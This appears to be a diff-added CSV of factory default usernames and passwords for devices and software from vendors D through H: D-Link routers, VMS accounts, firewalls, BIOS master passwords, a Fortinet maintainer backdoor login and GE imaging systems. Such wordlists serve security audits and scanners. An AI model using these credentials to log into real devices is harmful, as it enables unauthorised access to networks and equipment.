+digitalequipment,IRIS,,Multi,manager,manager,Admin,, +digitalequipment,IRIS,,Multi,software,software,User,, +digitalequipment,PC BIOS,,Console,,komprie,Admin,, +digitalequipment,RSX,,Multi,1,,Level 1,, +digitalequipment,RSX,,Multi,1.1,SYSTEM,Admin,, +digitalequipment,RSX,,Multi,BATCH,BATCH,User,, +digitalequipment,RSX,,Multi,SYSTEM,MANAGER,Admin,, +digitalequipment,RSX,,Multi,SYSTEM,SYSTEM,Admin,, +digitalequipment,RSX,,Multi,USER,USER,User,, +digitalequipment,Terminal Server,,Port 7000,,access,User,, +digitalequipment,Terminal Server,,Port 7000,,system,Admin,, +digitalequipment,VMS,,Multi,ALLIN1,ALLIN1,,, +digitalequipment,VMS,,Multi,ALLIN1MAIL,ALLIN1MAIL,,, +digitalequipment,VMS,,Multi,ALLINONE,ALLINONE,,, +digitalequipment,VMS,,Multi,BACKUP,BACKUP,,, +digitalequipment,VMS,,Multi,DCL,DCL,,, +digitalequipment,VMS,,Multi,DECMAIL,DECMAIL,,, +digitalequipment,VMS,,Multi,DECNET,DECNET,,, +digitalequipment,VMS,,Multi,DECNET,NONPRIV,,, +digitalequipment,VMS,,Multi,DEFAULT,DEFAULT,,, +digitalequipment,VMS,,Multi,DEFAULT,USER,,, +digitalequipment,VMS,,Multi,DEMO,DEMO,,, +digitalequipment,VMS,,Multi,FIELD,DIGITAL,,, +digitalequipment,VMS,,Multi,FIELD,FIELD,,, +digitalequipment,VMS,,Multi,FIELD,SERVICE,,, +digitalequipment,VMS,,Multi,FIELD,TEST,,, +digitalequipment,VMS,,Multi,GUEST,GUEST,,, +digitalequipment,VMS,,Multi,HELP,HELP,,, +digitalequipment,VMS,,Multi,HELPDESK,HELPDESK,,, +digitalequipment,VMS,,Multi,HOST,HOST,,, +digitalequipment,VMS,,Multi,INFO,INFO,,, +digitalequipment,VMS,,Multi,INGRES,INGRES,,, +digitalequipment,VMS,,Multi,LINK,LINK,,, +digitalequipment,VMS,,Multi,MAILER,MAILER,,, +digitalequipment,VMS,,Multi,MBMANAGER,MBMANAGER,,, +digitalequipment,VMS,,Multi,MBWATCH,MBWATCH,,, +digitalequipment,VMS,,Multi,NETCON,NETCON,,, +digitalequipment,VMS,,Multi,NETMGR,NETMGR,,, +digitalequipment,VMS,,Multi,NETNONPRIV,NETNONPRIV,,, +digitalequipment,VMS,,Multi,NETPRIV,NETPRIV,,, +digitalequipment,VMS,,Multi,NETSERVER,NETSERVER,,, +digitalequipment,VMS,,Multi,NETWORK,NETWORK,,, +digitalequipment,VMS,,Multi,NEWINGRES,NEWINGRES,,, +digitalequipment,VMS,,Multi,NEWS,NEWS,,, +digitalequipment,VMS,,Multi,OPERVAX,OPERVAX,,, +digitalequipment,VMS,,Multi,POSTMASTER,POSTMASTER,,, +digitalequipment,VMS,,Multi,PRIV,PRIV,,, +digitalequipment,VMS,,Multi,REPORT,REPORT,,, +digitalequipment,VMS,,Multi,RJE,RJE,,, +digitalequipment,VMS,,Multi,STUDENT,STUDENT,,, +digitalequipment,VMS,,Multi,SYS,SYS,,, +digitalequipment,VMS,,Multi,SYSMAINT,DIGITAL,,, +digitalequipment,VMS,,Multi,SYSMAINT,SERVICE,,, +digitalequipment,VMS,,Multi,SYSMAINT,SYSMAINT,,, +digitalequipment,VMS,,Multi,SYSTEM,MANAGER,,, +digitalequipment,VMS,,Multi,SYSTEM,OPERATOR,,, +digitalequipment,VMS,,Multi,SYSTEM,SYSLIB,,, +digitalequipment,VMS,,Multi,SYSTEM,SYSTEM,,, +digitalequipment,VMS,,Multi,SYSTEST,UETP,,, +digitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST,,, +digitalequipment,VMS,,Multi,SYSTEST_CLIG,SYSTEST_CLIG,,, +digitalequipment,VMS,,Multi,TELEDEMO,TELEDEMO,,, +digitalequipment,VMS,,Multi,TEST,TEST,,, +digitalequipment,VMS,,Multi,UETP,UETP,,, +digitalequipment,VMS,,Multi,USER,PASSWORD,,, +digitalequipment,VMS,,Multi,USERP,USERP,,, +digitalequipment,VMS,,Multi,VAX,VAX,,, +digitalequipment,VMS,,Multi,VMS,VMS,,, +digitalequipment,decnet,,Multi,operator,admin,Guest,, +discar,PMC30,,,SUPERVISOR,DISCAR,,, +discar,PMC30,TODAS,Multi,SUPERVISOR,DISCAR,,, +dlink,,dir 655,,admin,blank,,, +dlink,All Models,All Versions,192.168.0.1,,211cmw91765,user,, +dlink,Cable/DSL Routers/Switches,,Multi,,admin,Admin,, +dlink,D-704P,,Multi,admin,admin,Admin,, +dlink,D-704P,rev b,Multi,admin,,Admin,, +dlink,DCS-1000,,HTTP,,,admin,, +dlink,DFL-1100 firewall,,HTTP,admin,,Admin,, +dlink,DFL-1600 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,, +dlink,DFL-200 firewall,,HTTP,admin,,Admin,, +dlink,DFL-200 firewall,,HTTP,admin,admin,Admin,, +dlink,DFL-210 firewall,,https://192.168.0.1,admin,admin,NetDefendOS Admin,, +dlink,DFL-300 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DFL-700 firewall,,HTTP,admin,,Admin,, +dlink,DFL-80 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DFL-CP310 firewall,,http://my.firewall,admin,Management Interface Admin,, +dlink,DFL-CPG310 firewall,,http://my.firewall,admin,Management Interface Admin,, +dlink,DFL-M510 firewall,,http://192.168.1.1,admin,admin,Admin,, +dlink,DGL-4100,,http://192.168.0.1,,,Administration,, +dlink,DGL-4300,,http://192.168.0.1,,,Administration,, +dlink,DGL-4500,,http://192.168.0.1,,,Administration,, +dlink,DI-106,,,administrator,@*nigU^D.ha,,winnt, +dlink,DI-206 ISDN router,,,Admin,Admin,,1.*, +dlink,DI-514 Router,,HTTP,admin,,,, +dlink,DI-514,,Multi,user,,Admin,, +dlink,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1, +dlink,DI-524,all,HTTP,user,,User,, +dlink,DI-604,,HTTP,user,,Admin,, +dlink,DI-604,1.62b+,HTTP,admin,,Admin,, +dlink,DI-604,2.02,HTTP,admin,admin,Admin,, +dlink,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1, +dlink,DI-614+,,HTTP,admin,,Admin,, +dlink,DI-614+,,HTTP,admin,admin,Admin,, +dlink,DI-614+,,HTTP,user,,User,, +dlink,DI-614+,any,HTTP,admin,,Admin,all access :D, +dlink,DI-614,,HTTP,admin,,Admin,, +dlink,DI-624+,,HTTP,admin,,,, +dlink,DI-624+,A3,HTTP,admin,admin,Admin,, +dlink,DI-624,,http://192.168.0.1,Admin,,admin,, +dlink,DI-624,all,HTTP,User,,Admin,, +dlink,DI-624M,,http://192.168.0.1,admin,,Administration,, +dlink,DI-624S,,http://192.168.0.1,admin,,Administration,, +dlink,DI-634M,,http://192.168.0.1,admin,,Administration,, +dlink,DI-701,unknown,Multi,admin,year2000,Admin,, +dlink,DI-704,,Multi,,admin,Admin,, +dlink,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches, +dlink,DI-704P,,http://192.168.0.1,admin,,Administration,, +dlink,DI-704UP,,http://192.168.0.1,admin,,Administration,, +dlink,DI-707P,,HTTP,admin,,Admin,, +dlink,DI-714 Router,,HTTP,admin,,,, +dlink,DI-714P+,,Multi,admin,,192.168.0.1,, +dlink,DI-724GU,,http://192.168.0.1,admin,,Administration,, +dlink,DI-724P+ Router,,HTTP,admin,,,, +dlink,DI-724U,,http://192.168.0.1,admin,,Administration,, +dlink,DI-764,,HTTP,admin,,Admin,, +dlink,DI-784 Router,,HTTP,admin,,,, +dlink,DI-804,v2.03,Multi,admin,,Admin,, +dlink,DI-804HV,,http://192.168.0.1,admin,,Administration,, +dlink,DI-808HV,,http://192.168.0.1,admin,,Administration,, +dlink,DI-824VUP Airplus G Wireless VPN Router,,http://192.168.0.1,admin,,Administrator,, +dlink,DI-LB604,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-130,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-300,,192.168.0.1,admin,blank,administrator,, +dlink,DIR-300,,telnet 192.168.0.1,root,,shell,, +dlink,DIR-330,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-450,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-451,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-615 ,3.01,192.168.01 ,,family,family,, +dlink,DIR-615,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-615,Ver.1.10(I),http://192.168.0.1). ,Admin,,Admin,mantra88dotcom, +dlink,DIR-625,,http://192.168.0.1,admin,,administrator,, +dlink,DIR-635,,http://192.168.0.1,Admin,,Administration,, +dlink,DIR-655,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-660,,http://192.168.0.1,admin,,Administration,, +dlink,DIR-855,,http://192.168.0.1,admin,,Administration,, +dlink,DKVM-16 16-port keyboard/video/mouse switch,,,,00000000,,, +dlink,DSL Router,,,root,admin,Administrator,, +dlink,DSL-2640T,1.00(1),192.168.I.I,88612421,2421D,ADMIN,ADMIN, +dlink,DSL-300,?,Telnet,,private,,, +dlink,DSL-300G+,7.1.0.30,Telnet,,private,admin?,, +dlink,DSL-300g+,Teo,HTTP,admin,admin,Admin,, +dlink,DSL-300g+,Teo,Telnet,,private,Admin,, +dlink,DSL-302G,,Multi,admin,admin,Admin,, +dlink,DSL-500,,Multi,admin,admin,Admin,, +dlink,DSL-504,,HTTP,,private,Admin,, +dlink,DSL-504T,,http://10.1.1.1,admin,admin,Admin,, +dlink,DSL-604+,,,admin,admin,Admin,, +dlink,DSL-G604T,,http://10.1.1.1,admin,admin,Admin,, +dlink,DSL-G624T,?,? via WAN ...,root,admin,Admin,, +dlink,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS, +dlink,DSL500G,,Multi,admin,admin,Admin,, +dlink,DWL-1000+,,HTTP,admin,,Admin,, +dlink,DWL-1000,,HTTP,admin,,Admin,, +dlink,DWL-1000AP+,,http://192.168.0.50,admin,,Admin,, +dlink,DWL-1700AP,,http://192.168.0.50:2000,admin,root,,, +dlink,DWL-1750,,http://192.168.0.50:2000,admin,root,,, +dlink,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point, +dlink,DWL-2100AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-210AP,1.03,Wireless,admin,,,, +dlink,DWL-2200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-2210AP,,http://192.168.0.50,admin,admin,,, +dlink,DWL-2700AP,,MIB or AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-3150,,http://192.168.0.30,admin,,Administration,default SSID is 'dlink', +dlink,DWL-3200AP,,AP Mgr or D-View Module or http://192.168.0.50,admin,,,, +dlink,DWL-3200AP,,http://192.168.1.199,,,admin,, +dlink,DWL-5000AP,,http://192.168.0.50,admin,,,, +dlink,DWL-6000AP,Rev.A and Rev.B,multi interfaces incl. http://192.168.0.50,admin,,,, +dlink,DWL-614+,2.03,HTTP,admin,,Admin,, +dlink,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1, +dlink,DWL-7000AP,,http://192.168.0.50 or AP Mgr,admin,,,, +dlink,DWL-700AP,,http://192.168.0.50,admin,,Admin,, +dlink,DWL-7100AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-7200AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-7700AP,Rev. A and Rev. B,mutli console,admin,,Administration,default IP 192.168.0.50, +dlink,DWL-810+,,http://192.168.0.30,admin,,Admin,, +dlink,DWL-810,,http://192.168.0.30,admin,,Admin,, +dlink,DWL-8200AP,,multi console,admin,,,default IP 192.160.0.50, +dlink,DWL-8200AP,,multi console,admin,,,default IP 192.168.0.50 (/! Previous indication in the page is false!), +dlink,DWL-900+,,HTTP,admin,,Admin,, +dlink,DWL-900,,,admin,public,Admin,, +dlink,DWL-900AP+,,,Admin,1970,,, +dlink,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50, +dlink,DWL-900AP,,Multi,,public,Admin,, +dlink,DWL-900AP,,Multi,admin,public,Admin,, +dlink,DWL-900AP,,USB/SNMP,,public,Admin,default IP 192.168.0.20, +dlink,DWL-AG700AP,,http://192.168.0.50,admin,,Administration,, +dlink,DWL-G700AP,,HTTP,admin,,,, +dlink,DWL-G700AP,,http://192.168.0.50/,admin,olinda,,, +dlink,DWL-G710,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G730AP,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G800AP,,http://192.168.0.30,admin,,Administration,, +dlink,DWL-G820,,http://192.168.0.35,admin,,Administration,, +dlink,EBR-2310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-1310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-2310,,http://192.168.0.1,admin,,Administration,, +dlink,WBR-2310,revB,http://192.168.0.1,admin,,Administration,, +dlink,Windows XP,Windows XP,192.168.0.1,admin,password,admin,amdin, +dlink,hubs/switches,,Telnet,D-Link,D-Link,,, +dlink,wbr-2310,a1 1.02,192.168.0.1,D Link 25,,,, +dlink,windows xp,all,192.168.0.1,admin,,,, +draytek,Vigor 2200 USB,,,admin,,Admin,, +draytek,Vigor 2600 Plus Series,Annex A,HTTP,admin,,Admin,, +draytek,Vigor 2600,,HTTP,admin,,Admin,, +draytek,Vigor 2900+,,HTTP,admin,admin,Admin,, +draytek,Vigor,all,HTTP,admin,admin,Admin,, +dreambox,All models,all versions,http, telnet,root,dreambox,, +drupal.org,Drupal,,administrator,admin,admin,,, +dupont,Digital Water Proofer,,,root,par0t,,, +dynalink,RTA020,,,admin,private,,, +dynalink,RTA020,,Admin,admin,private,,, +dynalink,RTA020,,Multi,admin,private,Admin,, +dynalink,RTA1025W,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA1320,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA1335,,console,http//192.168.1.1,admin,admin,, +dynalink,RTA230,,,userNotUsed,userNotU,,, +dynalink,RTA230,,,userNotUsed,userNotU,Admin,, +dynalink,RTA230,,Multi,admin,admin,Admin,, +dynamode,BR-6004,,http,guest,guest,Standard admin access,, +dynix library systems,Dynix,,,LIBRARY,,,, +dynix library systems,Dynix,,,SETUP,,,, +dynix library systems,Dynix,,,circ,,,, +dynix library systems,Dynix,,,circ,,,, +dynix library systems,Dynix,,Admin,SETUP,,,, +dynix library systems,Dynix,,User,LIBRARY,,,, +dynixlibrarysystems,Dynix,,Multi,LIBRARY,,User,, +dynixlibrarysystems,Dynix,,Multi,SETUP,,Admin,, +dynixlibrarysystems,Dynix,,Multi,circ,(social security number),User,, +e-tech,Router,,Admin,,admin,,, +econ,Econ DSL Router,,Router,admin,epicrouter,Admin,DSL Router, +edimax,.,,,admin,1234,,, +edimax,.,,Multi,admin,1234,,, +edimax,6114wg,1.83,192.168.2.1,admin,1234,,, +edimax,7205APL,,,guest,1234,,, +edimax,7205APL,,,guest,1234,Guest - allows backup of config.bin,attacker can gain all passwords, +edimax,AR-6004,,,admin,1234,,, +edimax,AR-7024,,,admin,epicrouter,,, +edimax,AR-7024WG,,Default IP: 10.0.0.2,admin,epicrouter,Admin,, +edimax,AR-7024Wg,,Admin,admin,epicrouter,,, +edimax,AR-7084A,,192.168.2.1,admin,1234,Admin,, +edimax,AR-7084gA,3.0A,http://192.168.2.1,admin,1234,Admin,, +edimax,BR 4000+ Router,,,admin,password,,, +edimax,BR 4000+ Router,all,HTTP,admin,password,,, +edimax,BR-6204WG,,Default IP: 192.168.2.1,admin,1234,,, +edimax,BR-7209WG,,Default IP: 192.168.2.1,admin,1234,,, +edimax,Broadband Router,Hardware: Rev A. Boot Code: 1.0 Runtime Code 2.63,HTTP,admin,1234,Admin,, +edimax,ES-5224RXM,,Multi,admin,123,Admin,, +edimax,EW-7205APL,Firmware release 2.40a-00,Multi,guest,,Admin,, +edimax,Wireless ADSL Router,AR-7024,Multi,admin,epicrouter,Admin,, +edimax,br-6204,wg,http://192.168.2.1,admin,1234,admin,, +efficient networks,5851 SDSL Router,,,,hs7mwxkk,,, +efficient networks,5851 SDSL Router,,Admin,,hs7mwxkk,,, +efficient networks,EN 5861,,,login,admin,,, +efficient networks,EN 5861,,Admin,login,admin,,, +efficient networks,Speedstream 5711,,Admin,,4getme2,,, +efficient networks,Speedstream 5711,,Teledanmark version (only .dk),,4getme2,,, +efficient,5871 DSL Router,,Admin,login,admin,,, +efficient,5871 DSL Router,,v 5.3.3-0,login,admin,,, +efficient,Speedstream DSL,,,,admin,,, +efficient,Speedstream DSL,,Admin,,admin,,, +efficientnetworks,5800 Class DSL Routers,all,Multi,login,admin,Admin,, +efficientnetworks,5851 SDSL Router,N/A,Console,,hs7mwxkk,Admin,On some Covad Routers, +efficientnetworks,5851,,Telnet,login,password,Admin,might be all 5800 series, +efficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,, +efficientnetworks,5871 DSL Router,v 5.3.3-0,Multi,login,admin,Admin,This is for access to HTTP admin console., +efficientnetworks,EN 5861,,Telnet,login,admin,Admin,, +efficientnetworks,Speedstream DSL,,Telnet,,admin,Admin,, +efficientnetworks,Speedstream,5200,http/telnet,,,,Default IP 10.0.0.1/8, +efficientnetworks,Speedstream,5600,http/telnet,,,,Default IP 10.0.0.1/8, +efficientnetworks,Speedstream,5711 Teledanmark version (only .dk),Console,,4getme2,Admin,, +efficientnetworks,Speedstream,57xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24, +efficientnetworks,Speedstream,59xx series,http/telnet,login,admin,,Default IP 192.168.254.254/24, +efficientnetworks,Speedstream,various,http/telnet,superuser,admin,Admin,, +efficinet networks,5800 Class DSL Routers,,Admin,login,admin,,, +efficinet networks,5800 Class DSL Routers,,all,login,admin,,, +egenera,all models,all version,http, ssh, console,root,root, +elron,Firewall,,,(hostname/ipaddress),sysadmin,,, +elronsoftware,Elron Firewall,2.5c,,hostname/ip address,sysadmin,Admin,, +elsa,LANCom Office ISDN Router,,800/1000/1100,,,,, +elsa,LANCom Office ISDN Router,,Admin,,,,, +elsa,LANCom Office ISDN Router,,Admin,,cisco,,, +elsa,LANCom Office ISDN Router,1000,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,1000,Telnet,,cisco,Admin,, +elsa,LANCom Office ISDN Router,1100,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,1100,Telnet,,cisco,Admin,, +elsa,LANCom Office ISDN Router,800,Telnet,,,Admin,, +elsa,LANCom Office ISDN Router,800,Telnet,,cisco,Admin,, +emachines,notebook,,,emaq,4133,,, +eminent,EM4114,,,admin,admin,Administrator,, +encad,XPO,,,,,,, +encad,XPO,,Admin,,,,, +encad,XPO,,Multi,,,Admin,, +enhydra,Multiserver,,,admin,enhydra,,, +enhydra,Multiserver,,,admin,enhydra,Admin,, +enox,PC BIOS,,,,xo11nE,,, +enox,PC BIOS,,Admin,,xo11nE,,, +enox,PC BIOS,,Console,,xo11nE,Admin,, +enterasys,ANG-1105,,Admin,,netadmin,,, +enterasys,ANG-1105,,Admin,admin,netadmin,,, +enterasys,ANG-1105,,unknown,,netadmin,,, +enterasys,ANG-1105,,unknown,admin,netadmin,,, +enterasys,ANG-1105,unknown,HTTP,admin,netadmin,Admin,default IP is 192.168.1.1, +enterasys,ANG-1105,unknown,Telnet,,netadmin,Admin,default IP is 192.168.1.1, +enterasys,Vertical Horizon,ANY,Multi,admin,,Admin,this works in telnet or http, +enterasys,Vertical Horizon,VH-2402S,Multi,tiger,tiger123,Admin,, +entrust,Get Access Service Control Agent,,4.x,admin,admin,,, +entrust,GetAccess,4.x,http,admin,admin,Admin,, +entrust,GetAccess,4.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat, +entrust,GetAccess,7.x,http,websecadm,changeme,Admin,Access to Admin Gui via /sek-bin/login.gas.bat, +epox,PC BIOS,,,,central,,, +epox,PC BIOS,,Admin,,central,,, +epox,PC BIOS,,Console,,central,Admin,, +ericsson,ACC,,,netman,netman,,, +ericsson,Any router,,,netman,netman,,all, +ericsson,Ericsson ACC,,,netman,netman,,, +ericsson,Ericsson ACC,,Multi,,,Admin,, +ericsson,Ericsson Acc,,,netman,netman,,, +ericsson,Tigris Platform,All,Multi,public,,Guest,, +ericsson,W20,,,user,user,,, +ericsson,md110 pabx,,up-to-bc9,,help,,, +ericsson,md110 pabx,,varies depending on config minimal list access by default,,help,,, +ericsson,md110 pabx,up-to-bc9,Multi,,help,varies depending on config minimal list access by default,, +esesixcomputergmbh,Thintune,2.4.38-32-D,Connect port 25072,root,jstwo,Admin,, +etech,ADSL Ethernet Router,Annex A v2,HTTP,admin,epicrouter,Admin,Password can also be password, +etech,Router,RTBR03,HTTP,,admin,Admin,1wan/4ports switch router, +etech,Router,v1,HTTP,,admin,Admin,, +etech,Wireless 11Mbps Router Model:WLRT03,,HTTP,,admin,Admin,, +etech,rtbr03,rtbr03,Admin,admin,admin,,, +everfocus,ECOR 8F,,,admin,11111111,,, +everfocus,PowerPlex,,Admin,admin,admin,,, +everfocus,PowerPlex,,Admin,operator,operator,,, +everfocus,PowerPlex,,Admin,supervisor,supervisor,,, +everfocus,PowerPlex,,EDR1600,admin,admin,,, +everfocus,PowerPlex,,EDR1600,operator,operator,,, +everfocus,PowerPlex,,EDR1600,supervisor,supervisor,,, +everfocus,PowerPlex,EDR1600,Multi,admin,admin,Admin,, +everfocus,PowerPlex,EDR1600,Multi,operator,operator,Admin,, +everfocus,PowerPlex,EDR1600,Multi,supervisor,supervisor,Admin,, +everfocus,edsr400,,,Admin,admin,,, +exabyte,Magnum20,,FTP,anonymous,Exabyte,Admin,, +exindanetworks,1700,,Default login http://172.14.1.57,admin,exinda,Admin,, +extended systems,Firewall,,,admin,admin,,, +extended systems,Print Server,,,admin,extendnet,,, +extendedsystems,ExtendNet 4000 / Firewall,,,admin,admin,,all Versions, +extendedsystems,Print Servers,,,admin,extendnet,,, +extreme networks,All Switches,,,admin,,,, +extreme networks,All Switches,,Admin,admin,,,, +extreme networks,Alpine,,,admin,,,, +extreme networks,BlackDiamond,,,admin,,,, +extreme networks,Summit,,,admin,,,, +extreme networks,Switches,,,admin,,,, +extreme networks,Switches,,Admin,admin,,,, +extreme networks,Swithces,,,admin,,,, +extreme networks,Swithces,,Admin,admin,,,, +extremenetworks,All Switches,,Multi,admin,,Admin,, +extremenetworks,Alpine,,,admin,,Admin,, +extremenetworks,BlackDiamond,,,admin,,Admin,, +extremenetworks,Summit,,,admin,,Admin,, +extremenetworks,Switches,,,admin,,Admin,, +extremenetworks,Swithces,,Multi,admin,,Admin,, +f5,Big-IP 540,,Multi,root,default,Admin,, +f5,Big-IP,9.12,http,admin,admin,Administrator,, +fastwire,Fastwire Bank Transfer,,,fastwire,fw,,, +firebird,FirebirdSQL,,,SYSDBA,masterkey,,, +flowpoint,100 IDSN,,,admin,admin,,, +flowpoint,100 IDSN,,Admin,admin,admin,,, +flowpoint,100 IDSN,,Telnet,admin,admin,Admin,, +flowpoint,2200 SDSL,,,admin,admin,,, +flowpoint,2200 SDSL,,Admin,admin,admin,,, +flowpoint,2200 SDSL,,Telnet,admin,admin,Admin,, +flowpoint,40 IDSL,,,admin,admin,,, +flowpoint,40 IDSL,,Admin,admin,admin,,, +flowpoint,40 IDSL,,Telnet,admin,admin,Admin,, +flowpoint,DSL,,,,password,,, +flowpoint,DSL,,2000,admin,admin,,, +flowpoint,DSL,,Admin,,password,,, +flowpoint,DSL,,Admin,admin,admin,,, +flowpoint,DSL,,Telnet,,password,Admin,Installed by Covad, +flowpoint,DSL,2000,Telnet,admin,admin,Admin,, +flowpoint,Flowpoint DSL,,,admin,admin,Admin,, +flowpoint,Flowpoint/2000 ADSL,,,,,,, +flowpoint,Flowpoint/2000 ADSL,,Admin,,,,, +flowpoint,Flowpoint/2000 ADSL,,Telnet,,,Admin,, +fortigate,Fortinet firewall,,,admin,no password,,, +fortinet,FortiGate 300A,n/d,Multi,admin,no password,HTTP,, +fortinet,FortiGate firewall,,Multi,admin,no password,,, +fortinet,FortiGate,,Telnet,admin,,Admin,, +fortinet,FortiGate,,serial console,maintainer,pbcpbn(add serial number),Admin,, +fortinet,Fortigate 300A,,HTTP SSH,admin,no password,,, +foundry networks,IronView Network Manager,,Version 01.6.00a(service pack) 0620031754,admin,admin,,, +foundry networks,ServerIron,,,,,,, +foundrynetworks,IronView Network Manager,Version 01.6.00a(service pack) 0620031754,HTTP,admin,admin,Admin,, +foundrynetworks,ServerIron,,,,,Admin,, +freetech,PC BIOS,,,,Posterie,,, +freetech,PC BIOS,,Admin,,Posterie,,, +freetech,PC BIOS,,Console,,Posterie,Admin,, +fujitsusiemens,Routers,,HTTP,,connect,Admin,, +fujixerox,DocuPrint 3055,200911121222,http://10.0.14.50,,,admin,, +fujixerox,Document Centre C450,,console,11111,x-admin,,http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/, +funk software,Steel Belted Radius,,3.x,admin,radius,,, +funk software,Steel Belted Radius,,Admin,admin,radius,,, +funksoftware,Steel Belted Radius,3.x,Proprietary,admin,radius,Admin,, +funksoftware,Steel Belted Radius,450,,admin,radius,Admin,, +galacticomm,Major BBS,,,Sysop,Sysop,,, +galacticomm,Major BBS,,Admin,Sysop,Sysop,,, +galacticomm,Major BBS,,Multi,Sysop,Sysop,Admin,, +gandalf,XMUX,,,,console,,, +gandalf,XMUX,,,,gandalf,,, +gandalf,XMUX,,,,system,,, +gandalf,XMUX,,,,xmux,,, +gateway,WGR-200 Router,,,admin,admin,Admin,, +gateway,WGR-250 Router,,,admin,admin,Admin,, +ge,Data management system,,,administrator,Never!Mind,,, +ge,Data management system,,,museadmin,Muse!Admin,,, +ge,Data management system,1/2/3,Console,administrator,Never!Mind,,, +ge,Data management system,1/2/3,Console,museadmin,Muse!Admin,,, +ge,Enterprise Archive,,,administrator,eaadmin,,, +ge,Enterprise Archive,1/2,Console,administrator,eaadmin,,, +ge,Image management system,,,administrator,gemnet,,, +ge,Image management system,1/2/3,Console,administrator,gemnet,,, +ge,Maclab,,,mlcltechuser,mlcl!techuser,,, +ge,Maclab,1,Console,mlcltechuser,mlcl!techuser,,, +geeklog,Geeklog,,1.3.x,username,password,,, +geeklog,Geeklog,1.3.x,MySQL,username,password,,, +general instruments,Cable Modem,,,test,test,,, +generalinstruments,SB2100D Cable Modem,,,test,test,,, +gericom,Phoenix,,Multi,Administrator,,Admin,, +giga,8ippro1000,,Multi,Administrator,admin,Admin,, +gigabyte,GN-B49G,,,admin,admin,,, +gigabyte,GN-B49G,,HTTP,admin,admin,,, +gigabyte,GN-BR01G,,ip address,admin,admin,,, +glftpd,glftpd,1.32,Other,glftpd,glftpd,ftp,, +globespanvirata,GS8100,,,DSL,DSL,Admin,, +globespanvirata,Viking,,Telnet,root,root,admin,, +globespanvirata,Viking,,admin,root,root,,, +globespanvirata,all models,all versions,http://192.168.1.1,WebAdmin,,,, +gonet,,,,fast,abd234,,, +gossamerthreads,dbMan,,,admin,admin,Change/Delete Data in Database,, +gossamerthreads,dbMan,,,author,author,Change/Delete Data in Database,, +gossamerthreads,dbMan,,,guest,guest,Change/Delete Data in Database,, +grandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,123,Config (End User),, +grandstreamnetworks,GXV-3000 IP Video Phone,1.0.0.24,,,admin,Config (Advanced User),, +grandstreamnetworks,HandyTone 286,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 286,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 286,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 386,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 386,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 386,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 486,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 486,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 486,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 488,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 488,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 488,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone 496,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone 496,,HTTP,End User,,,, +grandstreamnetworks,HandyTone 496,,HTTP,End User,123,,, +grandstreamnetworks,HandyTone Budgetone-100 IP Phone,,HTTP,,admin,administrator,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,Administrator,admin,Admin,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,,,, +grandstreamnetworks,HandyTone GXP-2000,,HTTP,End User,123,,, +greatspeed,DUO,,,admin,broadband,,, +greatspeed,DUO,,HTTP,admin,broadband,,, +guardone,BizGuard,,,n.a,guardone,,, +guardone,BizGuard,,multi,,guardone,Admin,, +guardone,Restrictor,,,,guardone,,, +guardone,Restrictor,,multi,,guardone,Admin,, +gvc,e800/rb4,,HTTP,Administrator,admin,Admin,, +h2o project,Medialibrary,,,admin,admin,,, +h2oproject,Medialibrary,,HTTP,admin,admin,Admin,, +harris,DATU,,DTMF,,1111,,, +harris,DATU,,DTMF,,1234,,, +harris,DATU,,DTMF,,2345,,, +harris,DATU,,DTMF,,4300,,, +harris,DATU,,DTMF,,7373,,, +harris,MAU,,Modem,,4372266,,, +harris,SASS,,DTMF,,1111,,, +harris,SASS,,DTMF,,1122,,, +hawlett-packard,HP Omnibook 2100,,,,,,, +hayes,Century,,MR200,system,isp,,, 